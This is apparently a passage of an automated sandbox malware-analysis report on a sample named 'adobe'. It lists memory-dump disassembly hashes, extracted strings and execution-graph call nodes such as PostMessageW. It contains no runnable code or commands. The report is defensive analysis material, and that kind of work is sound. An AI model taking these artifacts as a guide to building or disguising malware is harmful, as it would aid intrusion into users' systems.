                        • Instruction ID: f73ed6690a29c93dd38baf51671307b4b9f5b5a838ae88d3e8e9677ab5d89399
                        • Opcode Fuzzy Hash: b1fed89aebc2b9f5e42ba7e0d3d54f3ff4a5e9f93e7722caea24dce389da38b5
                        • Instruction Fuzzy Hash: 88116D74B002249FDB84DF78C804B6E7BF5AF4C704F108469E60AEB3A0EB759901CB95
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c8ad9f38fde859e526ff476032febd2a09a52fdb93f771e0751b2d8518e0aa03
                        • Instruction ID: 86852bc3aebcbd9a93ea97a8b5752cacfad3c18b49b7bd9f4a5e3244b9628595
                        • Opcode Fuzzy Hash: c8ad9f38fde859e526ff476032febd2a09a52fdb93f771e0751b2d8518e0aa03
                        • Instruction Fuzzy Hash: 0E61F171F000214FDF149A7EC88466FBAD7AFC5220B19443AE80EDB325EE66DD4287D2
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 38a8d74685042b01e21cfada89053e03a756458a599ba27fcec9892b11cbbb7d
                        • Instruction ID: 9924fb2b0f7ab79232db887110b42f011fa2971d0c4f3d2db97d405e438580f1
                        • Opcode Fuzzy Hash: 38a8d74685042b01e21cfada89053e03a756458a599ba27fcec9892b11cbbb7d
                        • Instruction Fuzzy Hash: 09815B30B1060A8FDF54DFB9D8546AEB7F2AF89304F148529D50ADB394EB34EC468B91
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2ea9d4c4ee517006c2afdc01792c8041e89ca7bcf2f4bd7517cd0b9a65b1e6b9
                        • Instruction ID: 7b31844362c1f458ee8a6ef3957de2c515059a68ffc08ab74196ec80edbfb754
                        • Opcode Fuzzy Hash: 2ea9d4c4ee517006c2afdc01792c8041e89ca7bcf2f4bd7517cd0b9a65b1e6b9
                        • Instruction Fuzzy Hash: BF913E30E102198FDF64DF68C890B9DB7B1FF89304F208599D549EB255EB70AA86CB91
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3d01beef81452019da60b37e5bf58cf77633e94df3a9aaeecfbd2e2a190fef48
                        • Instruction ID: fb645b87d7b8531a981bebb730fa1428bb39275caed5509d48a5dda1d69ab941
                        • Opcode Fuzzy Hash: 3d01beef81452019da60b37e5bf58cf77633e94df3a9aaeecfbd2e2a190fef48
                        • Instruction Fuzzy Hash: 90913E34E102198BDF60DF68C880B9DB7B1FF89304F208599D549FB255EB70AA86CF91
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9dc46db9b55631fd0576ce4e6abdbe2efe5956de2bf53efd4aa3ab09aa1866cf
                        • Instruction ID: 7481fd8e52fc14d2440297f111e8b63f451abf770c01a5712722b288fefa71d2
                        • Opcode Fuzzy Hash: 9dc46db9b55631fd0576ce4e6abdbe2efe5956de2bf53efd4aa3ab09aa1866cf
                        • Instruction Fuzzy Hash: 88714B30E002099FDB58DBA9D984AADBBF6FF88304F188529E145EB355DB30E946CB50
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e9d2b1ae0663ff1ae317447a7a526bd4e9bca3a88ddd7d7e0b0be479a5066ad6
                        • Instruction ID: 2b89b1bbbf5b6d024d57cdbf7a48714186d2219a3ceaa180513304e604bba30c
                        • Opcode Fuzzy Hash: e9d2b1ae0663ff1ae317447a7a526bd4e9bca3a88ddd7d7e0b0be479a5066ad6
                        • Instruction Fuzzy Hash: B1713C30A001099FDB58DFA9D980AAEBBF6FF88304F188529E105EB355DB70ED46CB51
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 47e7f998e35473aa6499db21e47ae2e49adc8959e999bb7464f6e4c187e9e31b
                        • Instruction ID: c7932367c136b5b50b1ea45ecaeb52f23a98fa25ff4db3c5ae0899195cd1f491
                        • Opcode Fuzzy Hash: 47e7f998e35473aa6499db21e47ae2e49adc8959e999bb7464f6e4c187e9e31b
                        • Instruction Fuzzy Hash: F451C131E00109CFDF58AF78E8946ADBBB2EF85315F248869E30ADB351DB358945CB91
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4064bc41cdb65343ac17a3db166c997976b1be8a6fdf2aac120a29e8f51261b
                        • Instruction ID: 855e90954ee1f10ba893017b23d974ee4837092f19f0b9b8d9ac5ea6f3600d36
                        • Opcode Fuzzy Hash: f4064bc41cdb65343ac17a3db166c997976b1be8a6fdf2aac120a29e8f51261b
                        • Instruction Fuzzy Hash: 8A51ED34F102149FEF689A6CD95476F365BD78D310F24492AF30EE7399CA29CC4647A2
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6eeb63f76f2b8184020c64dca9e36c75ce28028a055093846791ea99f9e2b39f
                        • Instruction ID: b5a89969c3fed5a9bc140479424d95e42555bfad63c487974cfff45902500e35
                        • Opcode Fuzzy Hash: 6eeb63f76f2b8184020c64dca9e36c75ce28028a055093846791ea99f9e2b39f
                        • Instruction Fuzzy Hash: E251DA34B102149FEF68566DD95472F255FD78D350F24492AF30EE3399CA29CC4647A2
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f57c99087750a90dd7d4a3ade36bafff0e1da85a57310eecd664ef3b55c41785
                        • Instruction ID: 2fcdae8f76e014d747412f9764d8ad1e733a4cf028c42f7f43f42c32dc4a537f
                        • Opcode Fuzzy Hash: f57c99087750a90dd7d4a3ade36bafff0e1da85a57310eecd664ef3b55c41785
                        • Instruction Fuzzy Hash: 81414D71E006099BDFB1CEA9D880AAFF7F2EB44310F14492AE256D7650D330E9558FA2
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8b60ed3ab47a8ae797c5e01b3b8e1be0d03fcd31fa534d88ad9e0ef2a4a95c4e
                        • Instruction ID: de1230facf78157e0c01f9cca6c3a4d9256cf1e0cc3fdf96b10e87b210f3c22e
                        • Opcode Fuzzy Hash: 8b60ed3ab47a8ae797c5e01b3b8e1be0d03fcd31fa534d88ad9e0ef2a4a95c4e
                        • Instruction Fuzzy Hash: AC31D030E106069FDF59CFA4D86469EB7B2FF89310F148929E906E7350DB71AD46CB50
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 313bd1190994573c8a94d9ea657bb7d3a6195dbd1275f7b4c4c37feb307c69fc
                        • Instruction ID: c2c846e76502bd0a9feffcd6c45d55e4306edb36848559226d730851f0206465
                        • Opcode Fuzzy Hash: 313bd1190994573c8a94d9ea657bb7d3a6195dbd1275f7b4c4c37feb307c69fc
                        • Instruction Fuzzy Hash: 4F317E30E102069FDF59CFA5D86469EB7B2FF8A300F148929E906E7350DB71A946CB60
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5f612367be6ecc0f8e5264074296ec096839772da7dfd0d7bb631d97b76cb99a
                        • Instruction ID: 6ef1cfd30f6ded589b0df61ed02d67c03f8c27e71460bc3ac4a95a88c5695b63
                        • Opcode Fuzzy Hash: 5f612367be6ecc0f8e5264074296ec096839772da7dfd0d7bb631d97b76cb99a
                        • Instruction Fuzzy Hash: B0217C75F0021A9FDF50DF69E840AAEBBF5EB48714F148129EA45E7380E770ED418B94
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80ddc0cf7557e3232db3cdfb39403f6fd7c8f7ef0b1ef5ae07b39e0470b2084c
                        • Instruction ID: b0216922ed03ab7484214ec0b438a23cae0f20610412f8931792a9fe004a33b9
                        • Opcode Fuzzy Hash: 80ddc0cf7557e3232db3cdfb39403f6fd7c8f7ef0b1ef5ae07b39e0470b2084c
                        • Instruction Fuzzy Hash: 45217C75F0021A9FDF50DF69D840AAEBBF5EB48710F148129EA05E7380E770ED018BA5
                        Memory Dump Source
                        • Source File: 00000004.00000002.1871902313.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_fdd000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9b7fd92faaceafc6575547db1dc1ac3fbb78e6b4026b31fb7eb464b76a1fcaa9
                        • Instruction ID: 5c3b76d51a082e332859209631ad2fdc9fd7df2c9020c9fe0eee8a5c25769c0e
                        • Opcode Fuzzy Hash: 9b7fd92faaceafc6575547db1dc1ac3fbb78e6b4026b31fb7eb464b76a1fcaa9
                        • Instruction Fuzzy Hash: 78215E7150D3C09FD703CB24D994711BF71AB46214F29C5EBD8898F2A7C23A980ADB62
                        Memory Dump Source
                        • Source File: 00000004.00000002.1871902313.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_fdd000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 95d80dbf26979fd1db9137849bc15f8897696ed00223403e855049f0e72eaaec
                        • Instruction ID: 9c44828e8ebc2612e2166d49823f950151095182a6b791b228450642886bf292
                        • Opcode Fuzzy Hash: 95d80dbf26979fd1db9137849bc15f8897696ed00223403e855049f0e72eaaec
                        • Instruction Fuzzy Hash: B2210771504204DFDB14DF14D9C8B26BBA6FBC4324F28C56ED90A4B35AC336D847DA62
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8c7ad484a8a288ad82a1600352404dec61f8040de82607417c50f974cd3e6413
                        • Instruction ID: bcfe7ef76758cf7665b0179acee6b4b4aab60119fde0da3d1f84df235bb5ff5a
                        • Opcode Fuzzy Hash: 8c7ad484a8a288ad82a1600352404dec61f8040de82607417c50f974cd3e6413
                        • Instruction Fuzzy Hash: 2611AD36B001295FDF949A68D814AAF77FBABC8315F044539D50AE7384EE65DC028BE1
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a39808d406bcbc1f227dfb366c49f86e571022a684d60a7fb7a1aaf118264086
                        • Instruction ID: b1fbe5a961804e103d416792ac0e2fc45ea1593ead7f0a0e7ca0e8f38a36d7ad
                        • Opcode Fuzzy Hash: a39808d406bcbc1f227dfb366c49f86e571022a684d60a7fb7a1aaf118264086
                        • Instruction Fuzzy Hash: 2601B5357001105BEBA499EED85471EB6DAEBCA720F24883AE64AC7340DA35CC4343A5
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1bd35b31004acc514b2cd31ef1f5666f50775e1dfd7717c806de7a879373a9cb
                        • Instruction ID: c79e6b43ec2e06741fe02d9a70afd7e237394a5776160a7ec85d5cab3bcb8d7c
                        • Opcode Fuzzy Hash: 1bd35b31004acc514b2cd31ef1f5666f50775e1dfd7717c806de7a879373a9cb
                        • Instruction Fuzzy Hash: 60019271B041510FDB669679EC6072E7BD6DB8B315F18482EE249C7382EA65CC4243D6
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f1f708a42bfa84f008e213df7ccc1af3cb1799f81fc145c8cd49a5162fbca9be
                        • Instruction ID: 0e85305f471d680d3b0c5776b1f24ec586bd6a33473d477c0f5f05e016751c6a
                        • Opcode Fuzzy Hash: f1f708a42bfa84f008e213df7ccc1af3cb1799f81fc145c8cd49a5162fbca9be
                        • Instruction Fuzzy Hash: 5421C3B5D01259AFCB10CF9AD984ADEFBB4FB48314F10812AE918A7241D375A944CFA5
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7a5d3aae469239a8ac39a1a7af952d7bc19242712b6cb9d2e40c9ec755b9283
                        • Instruction ID: 65d1193128f4a4091008b97024a3350871818307fc7fc8d13bc2e15176aeb6d7
                        • Opcode Fuzzy Hash: c7a5d3aae469239a8ac39a1a7af952d7bc19242712b6cb9d2e40c9ec755b9283
                        • Instruction Fuzzy Hash: DD01B132B000255FDF949A69DC14AAF77EB9BC8214F04013AE50AE7384EE61D8028BF2
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a564257f2c2997a60ca88648aa38d9b34e215c6c6f102949edb822e4795c5260
                        • Instruction ID: c1d96e5570536ddb72127c5c87aaaf63562fd839ab4351889a2a137f0dc2a7f0
                        • Opcode Fuzzy Hash: a564257f2c2997a60ca88648aa38d9b34e215c6c6f102949edb822e4795c5260
                        • Instruction Fuzzy Hash: 0911D3B1D01219EFCB00CF9AD884ACEFBB4FB48314F10812AE518A7340C374A544CFA5
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 05b1a95b2f29638e8e4ad49cd00cdfcc6a773fb05ad82443ab53f9c9ec87ea37
                        • Instruction ID: ae5d44873130aaa6b9e4b8945da8321178d3b673158f43d462738c8721cbab25
                        • Opcode Fuzzy Hash: 05b1a95b2f29638e8e4ad49cd00cdfcc6a773fb05ad82443ab53f9c9ec87ea37
                        • Instruction Fuzzy Hash: 4C01F730B001151FDB959ABED850B1F77D6EB8B714F14893AE60AC7341DA31DC0283D1
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b18e373c8e379a3e6ac16051c6a3f893f893c020d7c53710c5b3245cc45f514e
                        • Instruction ID: cb998ae9c4e21ce8cb13a0f2a66124cd1f92c255b7bd37e13f67feab71c02bfc
                        • Opcode Fuzzy Hash: b18e373c8e379a3e6ac16051c6a3f893f893c020d7c53710c5b3245cc45f514e
                        • Instruction Fuzzy Hash: 5F016235B000101BDB6495EE985471EB2DAEBCE710F14C83AE60AC7344DA65DC4343A5
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0bea19b03f13ca8f858c2b2629460b164e21a73e557c1f9cd9458a2ce7cc0f9c
                        • Instruction ID: 2f473bded1425de3eab01372c59fe446e01bbfef3674ae232514867ea5a2fa93
                        • Opcode Fuzzy Hash: 0bea19b03f13ca8f858c2b2629460b164e21a73e557c1f9cd9458a2ce7cc0f9c
                        • Instruction Fuzzy Hash: 2B018C71B000111BDFAA966DE850B2E73DAEBCA624F18883AE30EC7340DA65DC0743E5
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ce471c60759ccf73991929b8339431eb201cea2f01c39dbbb4f0f6ea48695e82
                        • Instruction ID: 9ed08dd2b4904ee68de672ce17e714933cf0810bde3c5bfc7ccd94940136bf4f
                        • Opcode Fuzzy Hash: ce471c60759ccf73991929b8339431eb201cea2f01c39dbbb4f0f6ea48695e82
                        • Instruction Fuzzy Hash: 5E018630B104154FDB549ABED45071E73D6E78E714F148929E60AD7344DE31EC424795
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5e4f4f0241add3220682a096f9a00bf81d02cce094fbca136ee43a697f488712
                        • Instruction ID: ed8968d314939d4ae4541aecb2039e04edda05d46c246da942f41e264ec1a45b
                        • Opcode Fuzzy Hash: 5e4f4f0241add3220682a096f9a00bf81d02cce094fbca136ee43a697f488712
                        • Instruction Fuzzy Hash: 1AF0A736E20228A7DF146666D80069EB33AE784754F104525EA01E7244D732A80187E0
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f8223cef6b93bd97f511f1dad0686e2422184cc94e7e47f3cb74ba47eb6b3021
                        • Instruction ID: f91f5da9f6b997d74b5ec7a74e838b2666c171e60b11e6f3d63cb78fb1a863cd
                        • Opcode Fuzzy Hash: f8223cef6b93bd97f511f1dad0686e2422184cc94e7e47f3cb74ba47eb6b3021
                        • Instruction Fuzzy Hash: DFE0D8B1E10309ABEFE0CEB4C95575E77E8EB01214F2488A8D545C7101F636CA42CB51
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-2222239885
                        • Opcode ID: 52835daa7cd7f153b5bc46a96539fa85e3da78aa62c32d9b36f625e81e2024fc
                        • Instruction ID: be16cb8bfe60b8c30195683acb372730fb60f999af3071f0b93c5ff333f8e135
                        • Opcode Fuzzy Hash: 52835daa7cd7f153b5bc46a96539fa85e3da78aa62c32d9b36f625e81e2024fc
                        • Instruction Fuzzy Hash: BB122B30E1021A8FDF68DF69C954A9DB7B2BF88304F2485A9D509EB364DB309D85CF91
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-3823777903
                        • Opcode ID: 80d5dc8950b733f7e8a5bd4ad3af8ced7ab2826006b7ea83107c43792ff26798
                        • Instruction ID: 54c395b863c3614e0bc904d0fa3740e53e824be09b85c2e729eb6a5360b419ab
                        • Opcode Fuzzy Hash: 80d5dc8950b733f7e8a5bd4ad3af8ced7ab2826006b7ea83107c43792ff26798
                        • Instruction Fuzzy Hash: 7D916C30E0021A9FDF68DB65D955BAEB7F2BF84304F188529E402EB358DB759845CBA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-390881366
                        • Opcode ID: 9fc98a0b8d20881215af46f3837a6369f341e82cd190f64e72326728738f7ad2
                        • Instruction ID: 35a37e1375b89fa526473f18676cd75fc35105ebe2a60e859d3e723db3195b23
                        • Opcode Fuzzy Hash: 9fc98a0b8d20881215af46f3837a6369f341e82cd190f64e72326728738f7ad2
                        • Instruction Fuzzy Hash: E3F13F30B10209CFDF59EF65D594A6EB7B6BF84300F248669D4069B368DB31EC86CB90
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q
                        • API String ID: 0-2125118731
                        • Opcode ID: 89a2d6a69757e817ec7668b78cc0aab59b0b997300c3c1b5333f727a21aa29bc
                        • Instruction ID: 99a523abdca943789cadc69a2722449eda4208ac63b9a24f34aba0de512f4162
                        • Opcode Fuzzy Hash: 89a2d6a69757e817ec7668b78cc0aab59b0b997300c3c1b5333f727a21aa29bc
                        • Instruction Fuzzy Hash: D3B16D70B1020A8FDF64DF68D9846AEB7B2BF85304F288929D106DB355DB75DC86CB90
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q
                        • API String ID: 0-2125118731
                        • Opcode ID: 55b9f739c903720be16d1343b9e81fc16833315822f0cc1acc614637b2499f4a
                        • Instruction ID: 959a2316496ed7823f56d81f45dcaab3407270a2f8d4286cfd9b1d2735c02c29
                        • Opcode Fuzzy Hash: 55b9f739c903720be16d1343b9e81fc16833315822f0cc1acc614637b2499f4a
                        • Instruction Fuzzy Hash: E7517130E102099FDFA9DB64D9806ADB7B6EF84305F188629E906DB354DB31DC41CBA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: LR^q$LR^q$$^q$$^q
                        • API String ID: 0-2454687669
                        • Opcode ID: 33165c7eb1293e09e2a6df54f85547b3680ac1ff4d11b8a76f2b8fa94c4783b9
                        • Instruction ID: 2dcd2baab44cc46f0b57b605c363d9ccfdfd3299594b11ca31b808b99df36785
                        • Opcode Fuzzy Hash: 33165c7eb1293e09e2a6df54f85547b3680ac1ff4d11b8a76f2b8fa94c4783b9
                        • Instruction Fuzzy Hash: 4F51C470B002069FDF58DB29D941A6E77B1FF89304F148A69E501DB369DB30EC45CBA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q
                        • API String ID: 0-2125118731
                        • Opcode ID: a20a7d2c97706ec6f411f314f43dd9453366a459df0948147dd40e70abb49401
                        • Instruction ID: faaaa4336c93bc70b2e580dd011c6c340c604e29ed498a99b2b36900c4595fcf
                        • Opcode Fuzzy Hash: a20a7d2c97706ec6f411f314f43dd9453366a459df0948147dd40e70abb49401
                        • Instruction Fuzzy Hash: F4414C30B1020A8FDFA9DB64D5805ADB3F2EB84305F288629D905DB358DB31EC45CBA1

                        Execution Graph

                        Execution Coverage:10%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:227
                        Total number of Limit Nodes:16
                        execution_graph 24872 2b1d7e0 FindCloseChangeNotification 24873 2b1d847 24872->24873 24906 2b1b850 24907 2b1b9db 24906->24907 24909 2b1b876 24906->24909 24909->24907 24910 2b17d58 24909->24910 24911 2b1bad0 PostMessageW 24910->24911 24913 2b1bb3c 24911->24913 24913->24909 24924 2b19b84 24925 2b19b6e 24924->24925 24926 2b19b5e 24924->24926 24931 2b1a4d0 24926->24931 24951 2b1a511 24926->24951 24970 2b1a586 24926->24970 24990 2b1a520 24926->24990 24932 2b1a4f5 24931->24932 24933 2b1a52c 24931->24933 24932->24925 24934 2b1a542 24933->24934 25009 2b1ac73 24933->25009 25018 2b1aecf 24933->25018 25025 2b1b06c 24933->25025 25030 2b1a9ec 24933->25030 25034 2b1aa88 24933->25034 25041 2b1aba9 24933->25041 25048 2b1ad26 24933->25048 25055 2b1aa66 24933->25055 25062 2b1af67 24933->25062 25069 2b1ae22 24933->25069 25074 2b1aa42 24933->25074 25081 2b1adbf 24933->25081 25085 2b1ae5d 24933->25085 25089 2b1b1d8 24933->25089 25096 2b1ae96 24933->25096 25100 2b1ab15 24933->25100 24934->24925 24952 2b1a514 24951->24952 24953 2b1a542 24952->24953 24954 2b1ac73 4 API calls 24952->24954 24955 2b1ab15 2 API calls 24952->24955 24956 2b1ae96 2 API calls 24952->24956 24957 2b1b1d8 4 API calls 24952->24957 24958 2b1ae5d 2 